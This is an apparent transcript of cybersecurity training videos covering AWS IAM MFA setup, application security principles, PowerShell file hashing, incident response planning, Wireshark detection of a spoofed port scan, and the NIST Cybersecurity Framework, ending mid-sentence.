[Video description begins] He types 293978 in the MFA code 2 text box. The Assign MFA button gets
enabled. [Video description ends]
[Video description begins] The Set up virtual MFA device message box opens. It displays the message, You
have successfully assigned virtual MFA This virtual MFA will be required during sign-in. It also displays the
Close button. [Video description ends]
And it now tells me that I have successfully assigned the virtual MFA for this account.
[Video description begins] He clicks the Close button, and the message box closes. The Summary page
includes the text, User ARN arn:aws:iam::611279832722:user/jchavez. The Security credentials tab includes
the text, Summary Console sign-in link: https://611279832722. signin.aws.amazon.com/console. [Video
description ends]
And it says that this virtual MFA, multi-factor authentication, will be required during sign-in, in this case, for
this particular user, which is jchavez, as we can see listed all the way up here.
Notice here in Amazon Web Services while we're under the Security credentials tab, that we've got the console
sign-in link for this particular user. Why don't we fire that up and try to log in as that user and see what
happens?
[Video description begins] He opens the Amazon Web Services Sign-In web page. It includes the Account ID
or alias, IAM user name, and Password text boxes and the Sign In button. The Account ID or alias text box
has the value, 611279832722. The IAM user name and Password text boxes are blank. [Video description
ends]
So when I pop in that URL, it knows the Account ID. So I have to enter the IAM user name for Amazon Web Services along with the password; I still need to know those. But then when I click Sign In, it should require me to enter something else.
[Video description begins] He types jchavez in the IAM user name text box and password in the Password text
box. [Video description ends]
Because that is multi-factor authentication and that something else would only be available if I have my
smartphone where I've configured that authentication. So it's waiting for me to enter the MFA Code.
[Video description begins] He clicks the Sign In button. The MFA Code text box, the Submit button, and the
Cancel link appear. [Video description ends]
So all I would do on my smartphone is fire up, in my case, my Google Authenticator app. And for a certain
period of time, a code will be displayed before it changes to something else. So I'm going to go ahead and
enter in the code that is displayed currently to see if I can authenticate.
[Video description begins] He types 351264 in the MFA Code text box and clicks the Submit button. The error,
Your authentication information is incorrect. Please try again, appears above the Account ID or alias, IAM
user name, and Password text boxes and the Sign In button. [Video description ends]
Sometimes if you're not quick enough with the code, it might expire before it'll let you in. So let's go ahead and
try this again.
[Video description begins] He types password in the Password text box and clicks the Sign In button. The
MFA Code text box, the Submit button, and the Cancel link appear. [Video description ends]
I just have to wait for the code to update; it's just about expired on my smartphone app. Okay, let's try this again.
[Video description begins] He types 139381 in the MFA Code text box and clicks the Submit button. He gets
logged in to AWS Management Console. The user name, jchavez @ 6112-7983-2722, is present in the web
page. He hovers over this user name. [Video description ends]
Upon completion of this video, you will be able to recognize how security is applied to applications from
design to implementation.
Objectives
[Video description begins] Topic title: Securing Applications. The presenter is Dan Lachance. [Video
description ends]
Securing applications is an important aspect of cybersecurity. Whether we're talking about applications people
use personally or, of course, those also used for business productivity.
[Video description begins] Securing Applications [Video description ends]
The first consideration within an organization is whether off-the-shelf applications are being used, straight
from an app store, for example, in a mobile device environment. In which case, we want to make sure that
digital signatures are trusted. Most apps in common app stores are digitally signed by the organizations that
build them. And this digital signature can't be easily forged, and so it establishes a chain of trust. We trust that
the author of this application has built an application that is trustworthy. We've got a digital signature. At the
same time we can also have an organizational list of only approved apps that can be installed from specific app
stores.
In some cases, organizations can even build their own custom organizational app stores and make apps
available for business productivity that they control in that specific app store. Organizations can also
commission the creation of custom applications, or they can build their own. We also have to consider
where apps are being used in the sense of geofencing. If we've got a sensitive app that really should only be
used within the perimeter of a facility, or a campus, well then, we can configure geofencing so that the app
only works within that location. Securing applications also means dealing with access control. In other words,
dealing with an identity store where user accounts would exist. Or in some cases we also have devices that
authenticate to an application even without user intervention.
Or software can communicate with other pieces of software automatically, again, with no user intervention.
But either way, it's access control, it's a unique identity, and we need to make sure that strong authentication is
being used beyond just username and password type of authentication. Access control also deals with granting
a specific level of permission to a resource for an entity such as a user or a group. And so we want to make
sure that we adhere to the principle of least privilege, where we're only applying the permissions that are required
to perform a task, and nothing more. We should also consider whether we want to audit failed access attempts.
There is this notion also of application wrapping, whereby we can add user authentication to a specific
application.
You might have one app that is highly sensitive that requires further additional authentication beyond what the
user might already use, to sign into their laptop or their desktop or their phone. And so application wrapping
lets us add additional authentication to an app, even if the app doesn't support it internally, so we can add that
additional level of security. Logging is always an important part of security, and certainly that is the case when it comes to tracking application activity. We should always make sure, first of all, that logging is enabled for app usage.
And that we store additional copies of logs on a centralized logging host on a protected network. And that can
even be automated when it comes to configuring devices to forward specific log events elsewhere. Securing an
application also means changing default settings, such as where the app installed itself in terms of the file
system hierarchy. Changing any account names or passwords specifically associated with the app. So we never
stick with defaults when it comes to hardening an environment, that also applies to securing applications. If
your organization is building a custom application, then the development team will adhere to the software
development life cycle.
[Video description begins] Software Development Life Cycle [Video description ends]
Of course, if you use off-the-shelf software, commercial software, those programming teams also adhered to
this model. Where we have a number of different phases such as the requirements phase, what do we need
the software to do. Then, we can analyze whether there is already a solution out there or whether we're going
to do a custom built solution. Then we start designing the solution, followed by actual coding by programmers.
Which is then followed by testing, make sure that the code is secure, and that the application is functional and
meets requirements. Finally, we can then deploy the solution. Now, why are we talking about this? We're
talking about securing applications, and the point here is that through each and every one of these SDLC phases,
security must be thought of. We don't want to get to the point where we are testing and then realize we should
think about security. Or get to the point where we're actually writing code, and then start thinking about
security. Security needs to be a part of every software development life cycle phase. For web applications, we
can use a web application firewall, otherwise called a WAF, W-A-F.
The purpose of the web application firewall is to check for web application types of attacks, such as directory
traversal attacks. Or SQL injection attacks. Cross-site scripting attacks and many, many more. So it's a
specialized application-level firewall for web-based applications. Another option is to consider using a load balancing or reverse proxying solution, where a client request for an application would hit a public interface, for instance, of a load balancer. The load balancer in turn would determine which of the back-end servers actually hosting the app is the least busy, and forward the request to it. In this way we're hiding the true server identities of our application servers.
Encryption is always a good idea when it comes to securing applications. At the network level, we can think of using HTTPS. Now, HTTPS means that we've got access to a web application through a URL, and that the server needs a PKI certificate. And ideally, the server will be configured to use not SSL, not even SSL version 3, but rather TLS. And this way, we have a secure way of exchanging keys and information during
that encrypted session. We can also use virtual private networks or VPNs to allow people to work remotely.
They establish an encrypted tunnel with an endpoint, for example, a VPN concentrator on the premises or the
company location, and everything between the user device and that VPN concentrator is encrypted. Also we
might use IPsec. IPsec allows us to control very specifically which type of IP traffic is encrypted, even all of it.
And this happens regardless of application, it's not like we have to configure a PKI certificate for a specific
web app on a server like we would with HTTPS. So IPsec is much more broad in its potential application or
usage. Of course, it's always important to secure data at rest with encryption, such as in the file system,
encrypting files or folders, or disk volumes. Encrypting databases or replicas of databases that we might have
out there. The OWASP top 10 is very important when it comes to securing applications. You might be
wondering why? Why is it so important? OWASP stands for the Open Web Application Security Project. And
if you've never heard of this or taken it into account in the past, it deals with different types of web application security vulnerabilities that are then open to attacks like injection attacks, authentication that might be broken in an app, or security
misconfigurations. And every year there is an OWASP top 10, in terms of top 10 vulnerabilities, that gets
published. So OWASP is really focused on web app security, and also provides tools for securing and testing
web applications. So OWASP is very important when it comes to having a discussion about securing specifically web applications. Developers can also use the OWASP ESAPI, the Enterprise Security API, which allows developers to use secure coding functions that are already built and trusted.
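To make the SSL-versus-TLS point above concrete, here is a small, hedged PowerShell sketch of a client script that forces TLS 1.2 for its HTTPS call; the URL is purely illustrative and not part of any demo in this course.

# A minimal sketch, assuming a Windows PowerShell client script; the URL below is illustrative.
# Prefer TLS 1.2 rather than SSL 3.0 for outbound HTTPS calls made by this session.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$response = Invoke-WebRequest -Uri 'https://intranet.example.com/app' -UseBasicParsing
$response.StatusCode   # 200 indicates the request succeeded over the TLS session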
[Video description begins] Topic title: Implement File Hashing. The presenter is Dan Lachance. [Video
description ends]
In this demonstration, I'll implement file hashing using Microsoft Windows PowerShell. File hashing allows us
to generate a unique value based on the contents of a file. And we can compare that in the future when we run
file hashing again to see if those two unique hashes or values are the same.
Because if they're not, something has changed in the file. And so this is used often by forensic investigators
that gather IT digital evidence to ensure that data hasn't been tampered with. And it adheres to the chain of
custody.
[Video description begins] The Windows Powershell window is open. It displays the prompt, PS D:\work\
Projects_Sample_Files>. [Video description ends]
So the first thing I'm going to do here on my machine is point out that I've navigated to drive D, where I've got
some folders with some sample files. If I do a dir, we've got three project files, they're just text files.
[Video description begins] He executes the command: dir. The output displays a table with four column
headers: Mode, LastWriteTime, Length, and Name. The Mode column header has the value, -a----, for all the
rows. The LastWriteTime column header has the value, 11/08/16 12:32 PM, for all the rows. The Length
column header has the values, 456, 912, and 26112. The Name column header has the values, Project_A.txt,
Project_B.txt, and Project_C.txt. The prompt does not change. [Video description ends]
What I'm going to do is use the get-filehash PowerShell cmdlet. And I'm going to specify *, because I
want to get a filehash or generate a hash for each and every file within this current subdirectory. When I press
Enter, we can see the file hashes that are applied to each of the files.
[Video description begins] He executes the command: get-filehash *. The output displays a table with three
column headers: Algorithm, Hash, and Path. The Algorithm column has the values, SHA256, for all the rows.
The hash column header has the values,
62BC9ADF78D284822208F008ED68093059FF2AD61BE9332EC21AFB77A6480CA7,
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286EF2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A95AAF. The Path column
header has the values, D:\work\Projects_Sample_Files, for all the rows. The prompt does not change. [Video
description ends]
Now, what I'm going to do is make a change to the Project_A.txt file. I'll just use Notepad to do that. Then
we're going to come back and run get-filehash again to see if any of the hashes are different. So I'm just going
to run notepad here. And I'm going to run it against project_a.txt.
[Video description begins] He executes the command: notepad project_a.txt. The Project_A.txt file opens. It
displays the text, Sample text. The prompt does not change. [Video description ends]
And I'm just going to go ahead and make a change to the file. So maybe I'll just add Changed in the first line, and I will close and save the file. So the Project_A.txt file has been changed, we can agree on that. So I'm
going to use my up arrow key to go back to my command history. And once again, I'm going to run get-
filehash against all files in the current directory.
[Video description begins] He executes the command: get-filehash *, again. The output displays a table with
three column headers: Algorithm, Hash, and Path. The Algorithm column has the values, SHA256, for all the
rows. The hash column header has the values,
89814AB289AE01A11FC7CEFD1574E469B0DF0DB4C64DD8ED84A365F5AFBD4F28,
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286EF2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A95AAF. The Path column
header has the values, D:\work\Projects_Sample_Files, for all the rows. The prompt does not change. [Video
description ends]
Notice for the first entry, Project_A, you can't really see the file name, it's off the screen. But notice that the
hash originally began with 62BC9.
And it no longer begins with that, why? Because the file contents have changed, it's not the same file anymore.
But notice that the other file hashes respectively for the Project_B and Project_C files have remained the same.
And the reason for that is because they have not been modified.
So file hashing can definitely be useful if we want to detect whether something has been tampered with or
changed since the original hash was generated.
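If you wanted to automate this kind of tamper detection rather than eyeballing the hashes, a minimal sketch along the following lines could work; the baseline CSV file name is an assumption, not something created in the demo.

# Capture a baseline of SHA256 hashes for the sample project files (file names assumed)
Get-FileHash -Path .\Project_*.txt -Algorithm SHA256 |
    Select-Object Path, Hash |
    Export-Csv -Path .\hash_baseline.csv -NoTypeInformation

# Later: recompute each hash and warn about any file that no longer matches the baseline
$baseline = Import-Csv -Path .\hash_baseline.csv
foreach ($entry in $baseline) {
    $current = (Get-FileHash -Path $entry.Path -Algorithm SHA256).Hash
    if ($current -ne $entry.Hash) {
        Write-Warning "Changed since baseline: $($entry.Path)"
    }
}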
[Video description begins] Topic title: Incident Response Planning. The presenter is Dan Lachance. [Video
description ends]
We've all experienced at some point what it's like to be ill-prepared for a situation; it's not a good feeling. And
so this is what incident response planning is all about, planning ahead of time.
So it's proactive planning for IT security incidents, in terms of what will our response be when these negative
things happen. Now, these occurrences could be network outages, could be host downtime, perhaps due to
hardware failures or a malicious user compromise of that host. It could be a malware outbreak, could be an
incident related to cybercrime, or sensitive data loss. Either way, we want to make sure that we've planned for
all of these items ahead of time. Note that you can have more than one incident response plan, covering different aspects of systems and data within the organization.
Often these plans stem from a business impact analysis that was already conducted previously, when we
determine what the negative consequences are of threats being realized against assets. The recovery time
objective or the RTO is an important factor to consider when it comes to incident response planning. This is set
by the organization and normally it's measured in minutes or hours and it relates to a specific system. We're
talking about the maximum amount of tolerable downtime. So for example, if server 1 is a crucial server that is
used to generate revenue or something along those lines.
Perhaps we've determined that the RTO for server 1 can be no more than 2 hours, otherwise it has
unacceptable negative consequences against the organization. The other factor to consider is the recovery point
objective, the RPO. This one deals with the maximum amount of tolerable data loss. So for example, if we
determine that the company can afford to lose up to a maximum of 24 hours worth of a specific type of data,
then that would be the RPO. And that would dictate then, that we have to take backups of data at least once
every 24 hours. The incident response team is a collection of people that should know what their roles and
responsibilities are when incidents occur such as, who are the first responders?
And who do we escalate to if we have an incident that occurs and it falls outside of our skill set or our legal ability to do something about it? This needs to be known ahead of time and not during
the confusion of an incident actually in the midst of occurring. Well, how are we going to make that work? It's
actually very, very simple. We need to put aside some time to conduct periodic drills related to negative incidents occurring, so that we can gauge the effectiveness of the incident response plan and of the people, who ideally will know their roles. There should be a periodic review related to the results of those
periodic drills. Maybe there needs to be more training provided, and maybe more frequent drills, to make sure
that people know exactly how to respond when negative incidents occur. Now, what about when an incident response plan needs to get created?
[Video description begins] Creating an Incident Response Plan [Video description ends]
And remember, this is just specific to a business process, or an IT system supporting a business process or a
subset of data. So you're going to have a lot of these incident response plans. The first thing you do when you
create it, is identify the critical system or data that the response plan pertains to. Then, identify threat
likelihood against that asset. Identify single points of failure which might be as simple as having a single
Internet connection when we rely on data stored in the public cloud. We then need to assemble the incidence
response team, and then create the plan.
Now, the incident response plans will contain procedures, specifics for how to recover from a negative incident, such as system recovery steps or data restoration procedures. They might also specify which tools should be used, such as disk imaging tools or alternative boot mechanisms, which might be used to remove malware infections on a machine that can't be removed when the machine is booted normally. Tools could
also include things like contact lists that incident responders would use when they need to escalate.
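To tie this back to the RPO discussed earlier, here is a tiny, hedged PowerShell sketch of the arithmetic; the last-backup timestamp is hypothetical and the 24-hour RPO is the example value used above.

# Assumed RPO of 24 hours and a hypothetical last successful backup time
$rpoHours = 24
$lastBackup = Get-Date '2019-01-07 22:00'
# Hours of data that would be lost if an incident happened right now
$dataAtRiskHours = ((Get-Date) - $lastBackup).TotalHours
if ($dataAtRiskHours -gt $rpoHours) {
    Write-Warning ("RPO exceeded: about {0:N1} hours of data are currently at risk" -f $dataAtRiskHours)
}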
In this video, you will view a packet capture to identify suspicious activity.
Objectives
[Video description begins] Topic title: Examine Network Traffic for Security Incidents. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll examine network traffic, looking for security incidents. That can kind of feel like
looking for a needle in a haystack if you're doing it manually. And in this example, we will do it manually.
We're going to use the Wireshark free packet capturing tool to examine some packet captures.
But certainly, there are appliances, whether they're virtual machines or physical hardware devices, that you can
acquire, that will do a rigorous, detailed network analysis looking for anomalies. Often though, you're going to
have to feed it what is normal on your network, a security baseline, before it can determine what is suspicious.
So here, I've got a packet capture taken previously.
[Video description begins] The Wi-Fi window is open. It is divided into six parts. The first part is the menu
bar. The second part is the toolbar. The third part includes the Apply a display filter ... <Ctrl-/> search box.
The fourth part contains a table with the column headers: No., Time, Source, Destination, Protocol, Length,
and Info. The No. column header includes the values: 1196 and 1197. The Time column header includes the
values: 9.557259 and 9.557402. The Source column header includes the values: 1.1.1.1 and 192.168.0.20. The
Destination column header includes the value: 192.168.0.9. The Protocol column header includes the value:
TCP. The Length column header includes the value: 58. The Info column header includes the value: 38283 ->
80 [SYN] Seq=0 Win=1024 Len=0 MSS=1460. The fifth part includes the statement: Transmission Control
Protocol, Src Port: 38283, Dst Port: 80, Seq: 0, Len: 0. The sixth part includes 0000 9a de d0 a9 d9 39 18 56
80 c3 68 ba 08 00 45 00 .....9.V ..h...E. [Video description ends]
And this is something you might do periodically, kind of like a random spot check. Just start packet captures
on networks where you're allowed to do that, save the packet capture files for later analysis. You might simply
go through them out of interest because it is very interesting. But at the same time, you might also look for
things that perhaps shouldn't be on the network, protocols that shouldn't be in use. Or maybe rogue hosts that
were not there and now are showing up. So here in Wireshark, as I manually peruse through this packet
capture, I might come across things that look suspicious, such as IP addresses that don't normally fit the profile
of what is on our network.
[Video description begins] He scrolls through the table. [Video description ends]
For example, here I've got a source IP address of 1.1.1.1, where my subnet is 192.168.0.
[Video description begins] He points to the 192.168.0.20 value in the Source column header. [Video
description ends]
Now, that is not to say we shouldn't have any traffic outside of our subnet. Perhaps the subnet does allow
traffic from other locations. However, the other thing to watch out for is to filter when you find something that
you might think is suspicious. So for example, maybe here, a filter for 1.1.1.1.
[Video description begins] He types 1.1.1.1 in the Apply a display filter ... <Ctrl-/> search box. [Video
description ends]
Now, notice that when I try to type that in and press Enter, I have a red bar and nothing happens. Well, that is because I have to tie that value to a specific attribute. So for example, ip.addr equals 1.1.1.1.
[Video description begins] He alters the 1.1.1.1 value in the Apply a display filter ... <Ctrl-/> search box to
ip.addr==1.1.1.1. The No. column header includes the value: 1142. The Time column header includes the
value: 9.332956. The Source column header includes the value: 1.1.1.1. The Destination column header
includes the value: 192.168.0.5. The Protocol column header includes the value: TCP. The Length column
header includes the value: 58. The Info column header includes the value: 38282 -> 80 [SYN] Seq=0
Win=1024 Len=0 MSS=1460. The fifth part includes the expandable section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e (34:64:a9:67:13:0e). The sixth part
includes 0000 34 64 a9 67 13 0e 18 56 80 c3 68 ba 08 00 45 00 4d.g...V ..h...E.. [Video description ends]
So Wireshark has its own little syntax. Now we can see that we've filtered out the list and we're only seeing
1.1.1.1.
[Video description begins] He highlights the 1.1.1.1 value in the Source column header. The fifth part includes
the expandable sections: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e
(34:64:a9:67:13:0e), Internet Protocol Version 4, Src: 1.1.1.1, Dst: 192.168.0.5, and Transmission Control
Protocol, Src Port: 38282, Dst Port: 80, Seq: 0, Len: 0. The sixth part includes 0000 34 64 a9 67 13 0e 18 56
80 c3 68 ba 08 00 45 00 4d.g...V ..h...E. [Video description ends]
And if we select one of these packets, we can then start to break down the packet headers here.
[Video description begins] He expands the section: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba),
Dst: HewlettP_67:13:0e (34:64:a9:67:13:0e). It contains the text, Destination: HewlettP_67:13:0e
(34:64:a9:67:13:0e) Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba) and Type: IPv4 (0x0800). [Video
description ends]
Where, in the Ethernet header, we can see the source and destination MAC addresses, the hardware addresses,
the IP header, Internet Protocol.
[Video description begins] He expands the Internet Protocol Version 4, Src: 1.1.1.1, Dst: 192.168.0.5 section.
It includes the text: 0100 .... = Version: 4 .... 0101 = Header Length: 20 bytes (5), Flags: 0x0000 Time to live:
51 Protocol: TCP (6). [Video description ends]
Where we could see things like Time to live, the TTL value which is normally decremented by one each time
the transmission goes through a router, so it doesn't go around the Internet forever. There are other fields too in
the IP header, but here in the TCP header, we can see the Destination Port here is 80.
[Video description begins] He expands the expandable section, Transmission Control Protocol, Src Port:
38282, Dst Port: 80, Seq: 0, Len: 0. It includes the text, Destination Port: 80. [Video description ends]
Now what is suspicious here is from that same address, it looks like it's trying to hit TCP port 80, okay? It's
trying 192.168.0.2. Same with 0.3, trying to get to port 80, 0.5, port 80, okay.
[Video description begins] He points to the values, 192.168.0.2, 192.168.0.3, and 192.168.0.5, in the
Destination column header. [Video description ends]
What this is telling us is someone is conducting a port scan or some kind of a network scan against those hosts
for the same port number.
[Video description begins] He selects the value, 192.168.0.7, in the Destination column header. The fifth part
includes the expandable section: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst:
Sonos_13:31:9c (94:9f:3e:13:31:9c). [Video description ends]
That is not normal in that small period of time to have the same source IP scanning for the same port number
or trying to make a connection to that port number. Something is going on here. And at the same time, we
might take a look at 1.1.1.1 and look at the source MAC address.
[Video description begins] He expands the section: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba),
Dst: Sonos_13:31:9c (94:9f:3e:13:31:9c). It includes the text, Source: IntelCor_c3:68:ba
(18:56:80:c3:68:ba). [Video description ends]
Now, of course, it's easy to forge or spoof source IP addresses as well as MAC addresses.
[Video description begins] He points to the text, Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba). [Video
description ends]
You'll see forged IP addresses more often than you would see forged MAC addresses, but let's just take note of this MAC address, 18:56:80:c3:68:ba. Okay, I'm going to keep that in mind for a second. Now as I start looking through here and trying to draw correlations, notice down here that the destination being probed is 192.168.0.13.
[Video description begins] He selects the value, 192.168.0.13, in the Destination column header. The fifth part
includes the expandable section: Ethernet II, Src: IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst:
IntelCor_c3:68:ba(18:56:80:c3:68:ba). It includes the text, Destination: IntelCor_c3:68:ba
(18:56:80:c3:68:ba) and Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba). [Video description ends]
[Video description begins] He highlights the text, Destination: IntelCor_c3:68:ba (18:56:80:c3:68:ba). [Video
description ends]
What is going on here? So what this is telling me is that we've got a network scan, and that the person
conducting the scan is attempting to hide their true identity with IP address spoofing.
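Once you've spotted this pattern interactively, the same check can be scripted. Below is a minimal sketch using tshark, Wireshark's command-line companion; the capture file name and the filter values are assumptions based on what we saw in this capture.

# Show only the SYN probes coming from the suspicious source address (capture file name assumed)
tshark -r .\capture.pcapng -Y "ip.src == 1.1.1.1 && tcp.flags.syn == 1 && tcp.flags.ack == 0"

# Count how many distinct hosts that source tried to reach on TCP port 80 - a quick port-scan indicator
tshark -r .\capture.pcapng -Y "ip.src == 1.1.1.1 && tcp.dstport == 80" -T fields -e ip.dst |
    Sort-Object -Unique |
    Measure-Object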
[Video description begins] Topic title: Exercise: Auditing and Incident Response. The presenter is Dan
Lachance. [Video description ends]
In this exercise, the first thing you'll start with is to list three security auditing best practices. After that, you
will distinguish between vulnerability assessments and penetration testing, because those are not the same
things. Next, you'll explain how multi-factor authentication can enhance security. And finally, you'll list the
steps involved in creating an incident response plan. Now is a good time to pause the video, and to think about
each of these four bulleted items, and then afterwards you can come back to view the solutions.
[Video description begins] Solution. Security Auditing Best Practices. [Video description ends]
There are many security auditing best practices, including the use of unique user accounts. By users having their own logon credential set that isn't shared amongst other users, we have a way to track which activities were performed by which person, and therefore we have accountability for actions. We can also be selective about which events we want to audit. Instead of auditing all events, we can be much more judicious in our choices so that we'll only be notified of items that actually have relevant impact. We can also store audit logs on a central logging host. This way, if a device or a host containing audit logs itself is
compromised, and those logs are wiped or they're tampered with, well, we've got another central location
where we've got a copy of those. And often, that central logging host is very much hardened, so protected from
attack, and it's also stored on a protected network.
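To make the selective-auditing point concrete, here is a small, hedged sketch for a Windows host; auditpol and the 4625 failed-logon event ID are standard, but the specific subcategory you audit is a choice you would tailor to your own environment.

# Audit only failed logons rather than every possible event category (run from an elevated prompt)
auditpol /set /subcategory:"Logon" /failure:enable

# Review the most recent failed-logon events (Security log event ID 4625)
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625 } -MaxEvents 10 |
    Select-Object TimeCreated, Id, Message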
Vulnerability scanning is considered passive, because what we're doing is scanning a host or a range of IP
addresses or an entire subnet looking for weaknesses. However, when weaknesses are identified, that is as far
as it goes. Normally, vulnerability scanning won't cause a service disruption. Probably the worst thing that
could result from conducting a vulnerability scan would be setting off alarms. Because you're scanning devices
as a malicious user might do during the reconnaissance phase of hacking. So we can set off alarms; we should be
aware of that.
Penetration testing is a different beast altogether because it's considered active. Because it not only can identify
weaknesses, but it actually takes steps in an attempt to exploit those weaknesses. And depending on the
weakness in question, it can actually cause a service disruption for a specific system. So it's important then that
when we are conducting penetration testing, either through internal or external security auditors, that specific
pen test dates and times are set, so that we know when this is going to happen. You probably don't want a live,
active penetration test against a crucial business system during the height of when that system is required for
business productivity.
Multi-factor authentication, or MFA, uses at least two authentication categories, such as something you know, perhaps a user name and a password. That is two separate items, but they're both only one category – something you know – along with something you have. Maybe that would be in the form of a smartphone where you're being sent a unique code. And the combination of having the phone and that code sent to it, along with the name and password, will allow you into the system. So multi-factor authentication is certainly more difficult to crack than if we were using single-factor authentication, such as simply knowledge of the user name and password.
Creating an incident response plan begins with first identifying what it is that we want to be able to effectively
respond against in terms of realized threats against an asset. So we have to identify critical systems and/or data.
Then we have to look at what the likelihood is of threats against those systems and data actually occurring.
Then we need to identify and mitigate, ideally remove single points of failure. Then we need to assemble a
team that will be part of the incident response plan that will know their roles and responsibilities when certain
incidents occur. And finally, we can go ahead and create the plan. Incident response planning is crucial in today's technological environments, which are growing so vast and complex, and at the same time have so many possible threats against them.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview [Video description ends]
Hi, I'm Glen Clarke. I've been a certified trainer for over 20 years, teaching organizations how to manage their
network environments and program applications with Microsoft technologies.
[Video description begins] Your host for this session is Glen E. Clarke. He is an IT trainer and
consultant. [Video description ends]
I'm also an award-nominated author who's authored the CompTIA Security+ Certification Study Guide, the CompTIA Network+ Certification Study Guide, and the best-selling CompTIA A+ Certification All-in-One For Dummies. My focus over the last ten years has been teaching Microsoft certified courses, information security
courses, and networking courses such as Cisco ICND1 and ICND2. In this course, we're going to explore the
key concepts related to various types of security auditing, as well as audit strategies and auditing tools.
I'll start by identifying cyber security auditing key concepts, as well as the assessment and reporting processes.
I'll then demonstrate the Wireshark network security auditing tool, and the Nmap perimeter security tool. I'll
then describe how to perform auditing for web applications and Windows and Linux security monitoring.
Next, I'll examine strategies for cyber security audits, and compare the pros and cons of various audit tools.
Lastly, I'll demonstrate how to use the SS auditing tool to run an SS security system scan.
Upon completion of this video, you will be able to describe cyber security auditing concepts, the NIST
Cybersecurity Framework, and how they are used to improve infrastructure security.
Objectives
describe cyber security auditing concepts and the NIST Cybersecurity Framework and how they are
used to improve infrastructure security
[Video description begins] Topic title: Cyber Security Auditing. Your host for this session is Glen E. Clarke.
Screen title: Cyber Security Auditing Framework [Video description ends]
In this video, you will learn about cyber security auditing concepts. NIST has created a cyber security
framework whose focus is to manage cyber security risk. There are three components to the framework. First,
we have the framework core. The framework core is a set of activities, outcomes, and references that should be
followed by all critical infrastructures. It contains a set of industry standards, guidelines, and practices that
should be followed at all levels of the organization. The framework core is broken down into categories and
subcategories which represent discrete outcomes to be achieved.
We also have the framework implementation tiers, which focus on how an organization views cyber
security risk and the processes it has to manage that risk. The different tiers represent the organization's risk
management strategy and practices. And finally, we have the framework profile. The framework profile
represents the outcomes based on the business needs of the organization that have been selected from the set of
framework categories and subcategories. Organizations can create multiple framework profiles. For example,
they can have a current profile that shows their current cybersecurity posture, and a target profile that captures
the cybersecurity posture they want to reach.
[Video description begins] Screen title: Cyber Security Framework Core [Video description ends]
The framework core is divided into five functions that organizations should perform concurrently and
continuously to form an operational culture that addresses dynamic cyber security risk. First, we have the
identify function, where the goal is to develop an organizational understanding to manage cyber security risk to
the systems, the people, the assets, and the data within the organization. Understanding the business context,
the resources that support critical functions, and the related cyber security risk enables an organization to focus
and prioritize its efforts consistent with its risk management strategy and business needs.
Examples of outcome categories within this function include asset management, governance, risk assessment,
and identifying the company risk management strategy. Next, we have the protect function, which is the stage
to develop and implement appropriate safeguards to ensure continuous delivery of critical services. The protect
function supports the ability to limit or contain the impact of a potential cybersecurity event. Examples of
outcome categories within this function include identity management and access control, awareness and
training, data security, information protection processes and procedures, system maintenance, and protective
technology.
Then we have the detect function, where the goal is to develop and implement appropriate
activities to identify when a cyber security event occurs. Examples of outcome categories within this function
include anomalies and events, security continuous monitoring, and detection processes. Next we have the
respond function. In this function, you develop and implement appropriate activities to take action when a cyber
security incident is detected.
This includes containing the impact of a potential cyber security incident. Examples of outcome categories
within this function include response planning, response analysis, mitigation, and improvements. Finally, we
have the recover function, where the goal is to develop and implement appropriate activities to restore the
capabilities or services that were affected by a cyber security incident. Examples of outcome categories within
this function include recovery planning, improvements, and also communications.
[Video description begins] Screen title: Cyber Security Framework Core Elements [Video description ends]
The cyber security framework core contains the following elements. First, we have what we call a function. A
function is the highest level of cyber security activity; the functions are identify, protect, detect, respond, and recover.
Each of the functions are divided into categories with each category representing a grouping of cyber security
outcomes. Example categories are asset management, identity management and access control, and detection
processes. Each category is then divided into subcategories which represent a specific technical outcome or
management outcome. Some examples of subcategories are external information systems are catalogued, data
at rest is protected, or notifications from detection systems are investigated. The final element is what we call
informative references. Informative references are specific standards, guidelines, or practices that illustrate a
method to achieve an outcome.
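One informal way to picture that function, category, subcategory, and informative reference hierarchy is as nested data. The sketch below is illustrative only; the entries are paraphrased from the examples in this video, not the full NIST catalog:

```python
# Illustrative only: function > category > subcategory outcome > informative references.
framework_core = {
    "Identify": {
        "Asset Management": {
            "External information systems are catalogued": ["informative references would be listed here"],
        },
    },
    "Detect": {
        "Detection Processes": {
            "Notifications from detection systems are investigated": ["informative references would be listed here"],
        },
    },
}

for function, categories in framework_core.items():
    for category, subcategories in categories.items():
        for outcome, references in subcategories.items():
            print(f"{function} > {category} > {outcome} ({len(references)} reference)")
```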
[Video description begins] Screen title: Framework Implementation Tiers [Video description ends]
The framework implementation tiers provide a context on how the organization views cybersecurity risk and
the processes they have to mitigate that risk. The tiers range from tier 1 to tier 4, with each tier increasing the
sophistication in cybersecurity risk management practices. Tier 1, partial, involves a company that has no
formal approach to cybersecurity risk management practices and manages risk in an ad hoc or reactive
manner. Tier 1 means there is little awareness of cybersecurity risk within the organization, and the
organization deals with risk management as needed. Tier 2, risk informed, means that the risk management
practices are approved by management, but have not yet been implemented as policies.
There is awareness of cyber security risk, but an organization-wide approach has not been implemented yet. At
tier 3, repeatable, the organization has formal risk management practices approved and expressed as policies.
The organization’s cyber security practices are constantly updated based on the changing threat and technology
landscape. The company has a risk management program in place that is organization wide and includes risk
informed policies, processes, and procedures. And finally, we have tier 4, adaptive. Tier 4, adaptive, means that
the company adapts its cyber security practices based on lessons learned and predictive indicators. The company is
